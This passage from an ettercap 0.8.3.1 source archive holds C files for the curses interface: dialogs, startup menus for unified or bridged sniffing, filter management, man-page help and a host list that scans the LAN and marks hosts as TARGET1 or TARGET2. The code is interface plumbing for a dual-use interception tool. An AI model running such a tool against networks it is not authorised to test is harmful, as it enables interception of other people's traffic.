*/ wdg_create_object(&dlg, WDG_DIALOG, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_title(dlg, "ERROR:", WDG_ALIGN_LEFT); wdg_set_color(dlg, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(dlg, WDG_COLOR_WINDOW, EC_COLOR_ERROR); wdg_set_color(dlg, WDG_COLOR_FOCUS, EC_COLOR_ERROR_BORDER); wdg_set_color(dlg, WDG_COLOR_TITLE, EC_COLOR_ERROR); /* set the message */ wdg_dialog_text(dlg, WDG_OK, msg); wdg_draw_object(dlg); wdg_set_focus(dlg); } /* * handle a fatal error and exit */ static void curses_fatal_error(const char *msg) { DEBUG_MSG("curses_fatal_error: %s", msg); /* cleanup the curses mode */ wdg_cleanup(); fprintf(stderr, "FATAL ERROR: %s\n\n\n", msg); clean_exit(-1); } /* * get an input from the user */ void curses_input(const char *title, char *input, size_t n, void (*callback)(void)) { wdg_t *in; wdg_create_object(&in, WDG_INPUT, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_color(in, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(in, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(in, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(in, WDG_COLOR_TITLE, EC_COLOR_MENU); wdg_input_size(in, strlen(title) + n, 3); wdg_input_add(in, 1, 1, title, input, n, 1); wdg_input_set_callback(in, callback); wdg_draw_object(in); wdg_set_focus(in); /* block until user input */ wdg_input_get_input(in); } /* * implement the progress bar */ static int curses_progress(char *title, int value, int max) { static wdg_t *per = NULL; int ret; /* the first time, create the object */ if (per == NULL) { wdg_create_object(&per, WDG_PERCENTAGE, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_title(per, title, WDG_ALIGN_CENTER); wdg_set_color(per, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(per, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(per, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(per, WDG_COLOR_TITLE, EC_COLOR_MENU); wdg_draw_object(per); wdg_set_focus(per); } /* the subsequent calls have to only update the object */ ret = wdg_percentage_set(per, value, max); wdg_update_screen(); switch (ret) { case WDG_PERCENTAGE_FINISHED: /* * the object is self-destructing... * so we have only to set the pointer to null */ per = NULL; return UI_PROGRESS_FINISHED; break; case WDG_PERCENTAGE_INTERRUPTED: /* * the user has requested to stop the current task. * the percentage was self-destructed, we have to * set the pointer to null and return the proper value */ per = NULL; return UI_PROGRESS_INTERRUPTED; break; case WDG_PERCENTAGE_UPDATED: return UI_PROGRESS_UPDATED; break; } return UI_PROGRESS_UPDATED; } /* * process an update notification */ static void curses_update(int target) { switch(target) { case UI_UPDATE_HOSTLIST: curses_hosts_update(); break; case UI_UPDATE_PLUGINLIST: curses_plugins_update(); default: break; } } /* * print a message */ void curses_message(const char *msg) { wdg_t *dlg; DEBUG_MSG("curses_message: %s", msg); /* create the dialog */ wdg_create_object(&dlg, WDG_DIALOG, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_color(dlg, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(dlg, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(dlg, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(dlg, WDG_COLOR_TITLE, EC_COLOR_TITLE); /* set the message */ wdg_dialog_text(dlg, WDG_OK, msg); wdg_draw_object(dlg); wdg_set_focus(dlg); } /* the interface */ void curses_interface(void) { DEBUG_MSG("curses_interface"); /* if we have to activate a plugin */ curses_autostart_plugins(); /* which interface do we have to display ? */ if (EC_GBL_OPTIONS->read) curses_sniff_offline(); else curses_sniff_live(); /* destroy the previously allocated object */ wdg_destroy_object(&sysmsg_win); } static void toggle_unoffensive(void) { if (EC_GBL_OPTIONS->unoffensive) { tag_unoff[0] = ' '; EC_GBL_OPTIONS->unoffensive = 0; } else { tag_unoff[0] = '*'; EC_GBL_OPTIONS->unoffensive = 1; } } static void toggle_nopromisc(void) { if (EC_GBL_PCAP->promisc) { tag_promisc[0] = ' '; EC_GBL_PCAP->promisc = 0; } else { tag_promisc[0] = '*'; EC_GBL_PCAP->promisc = 1; } } /* * display the initial menu to setup global options * at startup. */ static void curses_setup(void) { wdg_t *menu; struct wdg_menu file[] = { {"File", 'F', "", NULL}, {"Open...", CTRL('O'), "C-o", curses_file_open}, {"Dump to file...", CTRL('D'), "C-d", curses_file_write}, {"-", 0, "", NULL}, {"Exit", CTRL('X'), "C-x", curses_exit}, {NULL, 0, NULL, NULL}, }; struct wdg_menu live[] = { {"Sniff", 'S', "", NULL}, {"Unified sniffing...", 'U', "U", curses_unified_sniff}, {"Bridged sniffing...", 'B', "B", curses_bridged_sniff}, {"-", 0, "", NULL}, {"Set pcap filter...", 'p', "p", curses_pcap_filter}, {NULL, 0, NULL, NULL}, }; struct wdg_menu options[] = { {"Options", 'O', "", NULL}, {"Unoffensive", 0, tag_unoff, toggle_unoffensive}, {"Promisc mode", 0, tag_promisc, toggle_nopromisc}, {"Set netmask", 'n', "n" , curses_set_netmask}, {NULL, 0, NULL, NULL}, }; DEBUG_MSG("curses_setup"); wdg_create_object(&menu, WDG_MENU, WDG_OBJ_WANT_FOCUS | WDG_OBJ_ROOT_OBJECT); wdg_set_title(menu, EC_GBL_VERSION, WDG_ALIGN_RIGHT); wdg_set_color(menu, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(menu, WDG_COLOR_WINDOW, EC_COLOR_MENU); wdg_set_color(menu, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(menu, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_menu_add(menu, file); wdg_menu_add(menu, live); wdg_menu_add(menu, options); wdg_menu_add(menu, menu_help); wdg_draw_object(menu); DEBUG_MSG("curses_setup: menu created"); /* create the bottom windows for user messages */ wdg_create_object(&sysmsg_win, WDG_SCROLL, WDG_OBJ_WANT_FOCUS); wdg_set_title(sysmsg_win, "User messages:", WDG_ALIGN_LEFT); wdg_set_size(sysmsg_win, 0, SYSMSG_WIN_SIZE, 0, 0); wdg_set_color(sysmsg_win, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(sysmsg_win, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(sysmsg_win, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(sysmsg_win, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(sysmsg_win, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_scroll_set_lines(sysmsg_win, 500); wdg_draw_object(sysmsg_win); /* give the focus to the menu */ wdg_set_focus(menu); DEBUG_MSG("curses_setup: sysmsg created"); /* initialize the options */ if (EC_GBL_OPTIONS->unoffensive) tag_unoff[0] = '*'; else tag_unoff[0] = ' '; if (EC_GBL_PCAP->promisc) tag_promisc[0] = '*'; else tag_promisc[0] = ' '; /* give the control to the interface */ wdg_events_handler('u'); wdg_destroy_object(&menu); DEBUG_MSG("curses_setup: end"); } /* * display the file open dialog */ static void curses_file_open(void) { wdg_t *fop; DEBUG_MSG("curses_file_open"); wdg_create_object(&fop, WDG_FILE, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_title(fop, "Select a pcap file...", WDG_ALIGN_LEFT); wdg_set_color(fop, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(fop, WDG_COLOR_WINDOW, EC_COLOR_MENU); wdg_set_color(fop, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(fop, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_file_set_callback(fop, read_pcapfile); wdg_draw_object(fop); wdg_set_focus(fop); } static void read_pcapfile(const char *path, char *file) { char pcap_errbuf[PCAP_ERRBUF_SIZE]; DEBUG_MSG("read_pcapfile %s/%s", path, file); SAFE_CALLOC(EC_GBL_OPTIONS->pcapfile_in, strlen(path)+strlen(file)+2, sizeof(char)); snprintf(EC_GBL_OPTIONS->pcapfile_in, strlen(path)+strlen(file)+2, "%s/%s", path, file); /* check if the file is good */ if (is_pcap_file(EC_GBL_OPTIONS->pcapfile_in, pcap_errbuf) != E_SUCCESS) { ui_error("%s", pcap_errbuf); SAFE_FREE(EC_GBL_OPTIONS->pcapfile_in); return; } /* set the options for reading from file */ EC_GBL_OPTIONS->silent = 1; EC_GBL_OPTIONS->unoffensive = 1; EC_GBL_OPTIONS->write = 0; EC_GBL_OPTIONS->read = 1; /* exit the setup interface, and go to the primary one */ wdg_exit(); } /* * display the write file menu */ static void curses_file_write(void) { #define FILE_LEN 40 DEBUG_MSG("curses_file_write"); SAFE_CALLOC(EC_GBL_OPTIONS->pcapfile_out, FILE_LEN, sizeof(char)); curses_input("Output file :", EC_GBL_OPTIONS->pcapfile_out, FILE_LEN, write_pcapfile); } static void write_pcapfile(void) { FILE *f; DEBUG_MSG("write_pcapfile"); /* check if the file is writeable */ f = fopen(EC_GBL_OPTIONS->pcapfile_out, "w"); if (f == NULL) { ui_error("Cannot write %s", EC_GBL_OPTIONS->pcapfile_out); SAFE_FREE(EC_GBL_OPTIONS->pcapfile_out); return; } /* if ok, delete it */ fclose(f); unlink(EC_GBL_OPTIONS->pcapfile_out); /* set the options for writing to a file */ EC_GBL_OPTIONS->write = 1; EC_GBL_OPTIONS->read = 0; } /* * display the interface selection dialog */ static void curses_unified_sniff(void) { #define IFACE_LEN 50 DEBUG_MSG("curses_unified_sniff"); /* if the user has not specified an interface, get the first one */ if (EC_GBL_OPTIONS->iface == NULL) { char *iface; SAFE_CALLOC(EC_GBL_OPTIONS->iface, IFACE_LEN, sizeof(char)); iface = capture_default_if(); ON_ERROR(iface, NULL, "No suitable interface found..."); strncpy(EC_GBL_OPTIONS->iface, iface, IFACE_LEN - 1); } /* calling wdg_exit will go to the next interface :) */ curses_input("Network interface :", EC_GBL_OPTIONS->iface, IFACE_LEN, wdg_exit); } /* * display the interface selection for bridged sniffing */ static void curses_bridged_sniff(void) { wdg_t *in; char *iface; DEBUG_MSG("curses_bridged_sniff"); /* if the user has not specified an interface, get the first one */ if (EC_GBL_OPTIONS->iface == NULL) { SAFE_CALLOC(EC_GBL_OPTIONS->iface, IFACE_LEN, sizeof(char)); iface = capture_default_if(); ON_ERROR(iface, NULL, "No suitable interface found...."); strncpy(EC_GBL_OPTIONS->iface, iface, IFACE_LEN - 1); } SAFE_CALLOC(EC_GBL_OPTIONS->iface_bridge, IFACE_LEN, sizeof(char)); wdg_create_object(&in, WDG_INPUT, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_color(in, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(in, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(in, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(in, WDG_COLOR_TITLE, EC_COLOR_MENU); wdg_input_size(in, strlen("Second network interface :") + IFACE_LEN, 4); wdg_input_add(in, 1, 1, "First network interface :", EC_GBL_OPTIONS->iface, IFACE_LEN, 1); wdg_input_add(in, 1, 2, "Second network interface :", EC_GBL_OPTIONS->iface_bridge, IFACE_LEN, 1); wdg_input_set_callback(in, bridged_sniff); wdg_draw_object(in); wdg_set_focus(in); } static void bridged_sniff(void) { set_bridge_sniff(); wdg_exit(); } /* * display the pcap filter dialog */ static void curses_pcap_filter(void) { #define PCAP_FILTER_LEN 50 DEBUG_MSG("curses_pcap_filter"); SAFE_CALLOC(EC_GBL_PCAP->filter, PCAP_FILTER_LEN, sizeof(char)); /* * no callback, the filter is set but we have to return to * the interface for other user input */ curses_input("Pcap filter :", EC_GBL_PCAP->filter, PCAP_FILTER_LEN, NULL); } /* * set a different netmask than the system one */ static void curses_set_netmask(void) { struct ip_addr net; DEBUG_MSG("curses_set_netmask"); if (EC_GBL_OPTIONS->netmask == NULL) SAFE_CALLOC(EC_GBL_OPTIONS->netmask, IP_ASCII_ADDR_LEN, sizeof(char)); /* * no callback, the filter is set but we have to return to * the interface for other user input */ curses_input("Netmask :", EC_GBL_OPTIONS->netmask, IP_ASCII_ADDR_LEN, NULL); /* sanity check */ if (strcmp(EC_GBL_OPTIONS->netmask, "") && ip_addr_pton(EC_GBL_OPTIONS->netmask, &net) != E_SUCCESS) ui_error("Invalid netmask %s", EC_GBL_OPTIONS->netmask); /* if no netmask was specified, free it */ if (!strcmp(EC_GBL_OPTIONS->netmask, "")) SAFE_FREE(EC_GBL_OPTIONS->netmask); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses.h000664 000000 000000 00000002005 13711276346 022021 0ustar00rootroot000000 000000 #ifndef ETTERCAP_CURSES_H #define ETTERCAP_CURSES_H #include #define SYSMSG_WIN_SIZE -8 #define CURSES_LOCK(x) do { pthread_mutex_lock(&x); } while (0) #define CURSES_UNLOCK(x) do { pthread_mutex_unlock(&x); } while (0) extern void set_curses_interface(void); extern void curses_input(const char *title, char *input, size_t n, void (*callback)(void)); extern void curses_message(const char *msg); extern void curses_flush_msg(void); extern void curses_sniff_offline(void); extern void curses_sniff_live(void); void curses_hosts_update(void); void curses_plugins_update(void); void curses_autostart_plugins(void); /* menus */ extern struct wdg_menu menu_filters[]; extern struct wdg_menu menu_logging[]; extern struct wdg_menu menu_help[]; extern struct wdg_menu menu_hosts[]; extern struct wdg_menu menu_mitm[]; extern struct wdg_menu menu_plugins[]; extern struct wdg_menu menu_start[]; extern struct wdg_menu menu_targets[]; extern struct wdg_menu menu_view[]; #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_filters.c000664 000000 000000 00000012036 13711276346 023551 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define MAX_DESC_LEN 75 /* proto */ static void curses_manage_filters(void); static void curses_select_filter(void *filter); static void curses_load_filter(void); static void load_filter(const char *path, char *file); static void curses_stop_filter(void); /* globals */ struct wdg_menu menu_filters[] = { {"Filters", 'F', "", NULL}, {"Manage filters", CTRL('M'), "C-m", curses_manage_filters}, {"Load a filter...", CTRL('F'), "C-f", curses_load_filter}, {"Stop filtering", 'f', "f", curses_stop_filter}, {NULL, 0, NULL, NULL}, }; /*******************************************/ static wdg_t *wdg_filters = NULL; static struct wdg_list *wdg_filters_elements; static int n_filters = 0; static int add_filter_to_list(struct filter_list *f, void *data) { /* variable not used */ (void) data; SAFE_REALLOC(wdg_filters_elements, (n_filters + 1) * sizeof(struct wdg_list)); SAFE_CALLOC(wdg_filters_elements[n_filters].desc, MAX_DESC_LEN + 1, sizeof(char)); snprintf(wdg_filters_elements[n_filters].desc, MAX_DESC_LEN, "[%c] %s", f->enabled?'X':' ', f->name); wdg_filters_elements[n_filters].value = f; n_filters++; return 1; } static void build_filter_list(void) { while (wdg_filters_elements && n_filters > 0) { SAFE_FREE(wdg_filters_elements[n_filters-1].desc); n_filters--; } SAFE_FREE(wdg_filters_elements); n_filters = 0; filter_walk_list( add_filter_to_list, &n_filters ); SAFE_REALLOC(wdg_filters_elements, (n_filters + 1) * sizeof(struct wdg_list)); /* 0-terminate the array */ wdg_filters_elements[n_filters].desc = NULL; wdg_filters_elements[n_filters].value = NULL; } static void refresh_filter_list(void) { build_filter_list(); wdg_list_set_elements(wdg_filters, wdg_filters_elements); wdg_list_refresh(wdg_filters); } static void curses_manage_filters(void) { if (!wdg_filters) { wdg_create_object(&wdg_filters, WDG_LIST, WDG_OBJ_WANT_FOCUS); } wdg_set_size(wdg_filters, 1, 2, -1, SYSMSG_WIN_SIZE - 1); wdg_set_title(wdg_filters, "Select a filter...", WDG_ALIGN_LEFT); wdg_set_color(wdg_filters, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_filters, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_filters, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(wdg_filters, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_filters, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_list_select_callback(wdg_filters, curses_select_filter); wdg_add_destroy_key(wdg_filters, CTRL('Q'), NULL); wdg_draw_object(wdg_filters); wdg_set_focus(wdg_filters); refresh_filter_list(); } static void curses_select_filter(void *filter) { if (filter == NULL) return; struct filter_list *f = filter; /* toggle the filter */ f->enabled = ! f->enabled; refresh_filter_list(); } /* * display the file open dialog */ static void curses_load_filter(void) { wdg_t *fop; DEBUG_MSG("curses_load_filter"); wdg_create_object(&fop, WDG_FILE, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_title(fop, "Select a precompiled filter file...", WDG_ALIGN_LEFT); wdg_set_color(fop, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(fop, WDG_COLOR_WINDOW, EC_COLOR_MENU); wdg_set_color(fop, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(fop, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_file_set_callback(fop, load_filter); wdg_draw_object(fop); wdg_set_focus(fop); } static void load_filter(const char *path, char *file) { char *tmp; DEBUG_MSG("load_filter %s/%s", path, file); SAFE_CALLOC(tmp, strlen(path)+strlen(file)+2, sizeof(char)); snprintf(tmp, strlen(path)+strlen(file)+2, "%s/%s", path, file); /* * load the filters chain. * errors are spawned by the function itself */ filter_load_file(tmp, EC_GBL_FILTERS, 1); SAFE_FREE(tmp); } /* * uload the filter chain */ static void curses_stop_filter(void) { DEBUG_MSG("curses_stop_filter"); filter_unload(EC_GBL_FILTERS); curses_message("Filters were unloaded"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_help.c000664 000000 000000 00000005242 13711276346 023032 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* proto */ void help_ettercap(void); void help_curses(void); void help_plugins(void); void help_etterconf(void); void help_etterfilter(void); void help_etterlog(void); /* globals */ struct wdg_menu menu_help[] = { {"?", 0, "", NULL}, {"ettercap" , 0, "", help_ettercap}, {"curses gui" , 0, "", help_curses}, {"plugins" , 0, "", help_plugins}, {"etter.conf" , 0, "", help_etterconf}, {"etterfilter" , 0, "", help_etterfilter}, {"etterlog" , 0, "", help_etterlog}, {NULL, 0, NULL, NULL}, }; /* macro */ #define SHOW_MAN(x, y) do { \ int ret; \ DEBUG_MSG("curses_help: retriving man page for: " x); \ endwin(); \ ret = system("man " x); \ if (ret != 0) \ ret = system("man " y); \ refresh(); \ if (ret != 0) \ ui_error("Cannot find man page for " x); \ } while(0) /*******************************************/ void help_ettercap(void) { SHOW_MAN("ettercap", "./man/ettercap.8"); } void help_curses(void) { SHOW_MAN("ettercap_curses", "./man/ettercap_curses.8"); } void help_plugins(void) { SHOW_MAN("ettercap_plugins", "./man/ettercap_plugins.8"); } void help_etterconf(void) { SHOW_MAN("etter.conf", "./man/etter.conf.5"); } void help_etterfilter(void) { SHOW_MAN("etterfilter", "./man/etterfilter.8"); } void help_etterlog(void) { SHOW_MAN("etterlog", "./man/etterlog.8"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_hosts.c000664 000000 000000 00000023323 13711276346 023242 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* proto */ #ifdef WITH_IPV6 static void toggle_ip6scan(void); #endif static void curses_scan(void); static void curses_load_hosts(void); static void load_hosts(const char *path, char *file); static void curses_save_hosts(void); static void save_hosts(void); static void curses_host_list(void); static void curses_hosts_destroy(void); static void curses_create_hosts_array(void); static void curses_delete_host(void *host); static void curses_host_target1(void *host); static void curses_host_target2(void *host); static void curses_hosts_help(void *dummy); /* globals */ #ifdef WITH_IPV6 static char tag_ip6scan[] = " "; #endif static wdg_t *wdg_hosts; static struct wdg_list *wdg_hosts_elements; struct wdg_menu menu_hosts[] = { {"Hosts", 'H', "", NULL}, {"Hosts list", 'h', "h", curses_host_list}, {"-", 0, "", NULL}, #ifdef WITH_IPV6 {"Enable IPv6 scan", 0, tag_ip6scan, toggle_ip6scan}, #endif {"Scan for hosts", CTRL('S'), "C-s", curses_scan}, {"Load from file...", 0, "", curses_load_hosts}, {"Save to file...", 0, "", curses_save_hosts}, {NULL, 0, NULL, NULL}, }; /*******************************************/ #ifdef WITH_IPV6 static void toggle_ip6scan(void) { if (EC_GBL_OPTIONS->ip6scan) { tag_ip6scan[0] = ' '; EC_GBL_OPTIONS->ip6scan = 0; } else { tag_ip6scan[0] = '*'; EC_GBL_OPTIONS->ip6scan = 1; } } #endif /* * scan the lan for hosts */ static void curses_scan(void) { /* no target defined... force a full scan */ if (EC_GBL_TARGET1->all_ip && EC_GBL_TARGET2->all_ip && EC_GBL_TARGET1->all_ip6 && EC_GBL_TARGET2->all_ip6 && !EC_GBL_TARGET1->scan_all && !EC_GBL_TARGET2->scan_all) { EC_GBL_TARGET1->scan_all = 1; EC_GBL_TARGET2->scan_all = 1; } /* perform a new scan */ build_hosts_list(); } /* * display the file open dialog */ static void curses_load_hosts(void) { wdg_t *fop; DEBUG_MSG("curses_load_hosts"); wdg_create_object(&fop, WDG_FILE, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_title(fop, "Select an hosts file...", WDG_ALIGN_LEFT); wdg_set_color(fop, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(fop, WDG_COLOR_WINDOW, EC_COLOR_MENU); wdg_set_color(fop, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(fop, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_file_set_callback(fop, load_hosts); wdg_draw_object(fop); wdg_set_focus(fop); } static void load_hosts(const char *path, char *file) { char *tmp; char current[PATH_MAX]; DEBUG_MSG("load_hosts %s/%s", path, file); SAFE_CALLOC(tmp, strlen(path)+strlen(file)+2, sizeof(char)); /* get the current working directory */ getcwd(current, PATH_MAX); /* we are opening a file in the current dir. * use the relative path, so we can open files * in the current dir even if the complete path * is not traversable with ec_uid permissions */ if (!strcmp(current, path)) sprintf(tmp, "./%s", file); else sprintf(tmp, "%s/%s", path, file); /* wipe the current list */ del_hosts_list(); /* load the hosts list */ scan_load_hosts(tmp); SAFE_FREE(tmp); curses_host_list(); } /* * display the write file menu */ static void curses_save_hosts(void) { #define FILE_LEN 40 DEBUG_MSG("curses_save_hosts"); SAFE_FREE(EC_GBL_OPTIONS->hostsfile); SAFE_CALLOC(EC_GBL_OPTIONS->hostsfile, FILE_LEN, sizeof(char)); curses_input("Output file :", EC_GBL_OPTIONS->hostsfile, FILE_LEN, save_hosts); } static void save_hosts(void) { FILE *f; /* check if the file is writeable */ f = fopen(EC_GBL_OPTIONS->hostsfile, "w"); if (f == NULL) { ui_error("Cannot write %s", EC_GBL_OPTIONS->hostsfile); SAFE_FREE(EC_GBL_OPTIONS->hostsfile); return; } /* if ok, delete it */ fclose(f); unlink(EC_GBL_OPTIONS->hostsfile); scan_save_hosts(EC_GBL_OPTIONS->hostsfile); } /* * display the host list */ static void curses_host_list(void) { DEBUG_MSG("curses_host_list"); /* if the object already exist, recreate it */ if (wdg_hosts) { wdg_destroy_object(&wdg_hosts); } wdg_create_object(&wdg_hosts, WDG_LIST, WDG_OBJ_WANT_FOCUS); wdg_set_size(wdg_hosts, 1, 2, -1, SYSMSG_WIN_SIZE - 1); wdg_set_title(wdg_hosts, "Hosts list...", WDG_ALIGN_LEFT); wdg_set_color(wdg_hosts, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_hosts, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_hosts, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(wdg_hosts, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_hosts, WDG_COLOR_TITLE, EC_COLOR_TITLE); /* create the array for the list widget */ curses_create_hosts_array(); /* set the elements */ wdg_list_set_elements(wdg_hosts, wdg_hosts_elements); /* add the destroy callback */ wdg_add_destroy_key(wdg_hosts, CTRL('Q'), curses_hosts_destroy); /* add the callbacks */ wdg_list_add_callback(wdg_hosts, 'd', curses_delete_host); wdg_list_add_callback(wdg_hosts, '1', curses_host_target1); wdg_list_add_callback(wdg_hosts, '2', curses_host_target2); wdg_list_add_callback(wdg_hosts, ' ', curses_hosts_help); wdg_draw_object(wdg_hosts); wdg_set_focus(wdg_hosts); } static void curses_hosts_destroy(void) { wdg_hosts = NULL; } void curses_hosts_update() { if(wdg_hosts) curses_host_list(); } static void curses_hosts_help(void *dummy) { /* variable not used */ (void) dummy; char help[] = "HELP: shortcut list:\n\n" " d - to delete an host from the list\n" " 1 - to add the host to TARGET1\n" " 2 - to add the host to TARGET2"; curses_message(help); } /* * create the array for the widget. * erase any previously alloc'd array */ static void curses_create_hosts_array(void) { int i = 0; struct hosts_list *hl; char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; size_t nhosts; #define MAX_DESC_LEN MAX_ASCII_ADDR_LEN*2 + MAX_HOSTNAME_LEN + 4 DEBUG_MSG("curses_create_hosts_array"); /* free the array (if alloc'ed) */ while (wdg_hosts_elements && wdg_hosts_elements[i].desc != NULL) { SAFE_FREE(wdg_hosts_elements[i].desc); i++; } SAFE_FREE(wdg_hosts_elements); nhosts = 0; /* walk the hosts list */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { /* enlarge the array */ SAFE_REALLOC(wdg_hosts_elements, (nhosts + 1) * sizeof(struct wdg_list)); /* fill the element */ SAFE_CALLOC(wdg_hosts_elements[nhosts].desc, MAX_DESC_LEN + 1, sizeof(char)); /* print the description in the array */ if (hl->hostname) { snprintf(wdg_hosts_elements[nhosts].desc, MAX_DESC_LEN, "%-15s %17s %s", ip_addr_ntoa(&hl->ip, tmp), mac_addr_ntoa(hl->mac, tmp2), hl->hostname); } else { /* resolve the hostname (using the cache) */ host_iptoa(&hl->ip, name); snprintf(wdg_hosts_elements[nhosts].desc, MAX_DESC_LEN, "%-15s %17s %s", ip_addr_ntoa(&hl->ip, tmp), mac_addr_ntoa(hl->mac, tmp2), name); } wdg_hosts_elements[nhosts].value = hl; nhosts++; } /* null terminate the array */ SAFE_REALLOC(wdg_hosts_elements, (nhosts + 1) * sizeof(struct wdg_list)); wdg_hosts_elements[nhosts].desc = NULL; wdg_hosts_elements[nhosts].value = NULL; } /* * deletes one host from the list */ static void curses_delete_host(void *host) { struct hosts_list *hl; /* sanity check */ if (host == NULL) return; /* cast the parameter */ hl = (struct hosts_list *)host; /* remove the host from the list */ LIST_REMOVE(hl, next); SAFE_FREE(hl->hostname); SAFE_FREE(hl); /* redraw the window */ curses_host_list(); } /* * add an host to TARGET 1 */ static void curses_host_target1(void *host) { struct hosts_list *hl; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("curses_host_target1"); /* cast the parameter */ hl = (struct hosts_list *)host; /* add the ip to the target */ add_ip_list(&hl->ip, EC_GBL_TARGET1); USER_MSG("Host %s added to TARGET1\n", ip_addr_ntoa(&hl->ip, tmp)); } /* * add an host to TARGET 2 */ static void curses_host_target2(void *host) { struct hosts_list *hl; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("curses_host_target2"); /* cast the parameter */ hl = (struct hosts_list *)host; /* add the ip to the target */ add_ip_list(&hl->ip, EC_GBL_TARGET2); USER_MSG("Host %s added to TARGET2\n", ip_addr_ntoa(&hl->ip, tmp)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_live.c000664 000000 000000 00000004330 13711276346 023036 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software 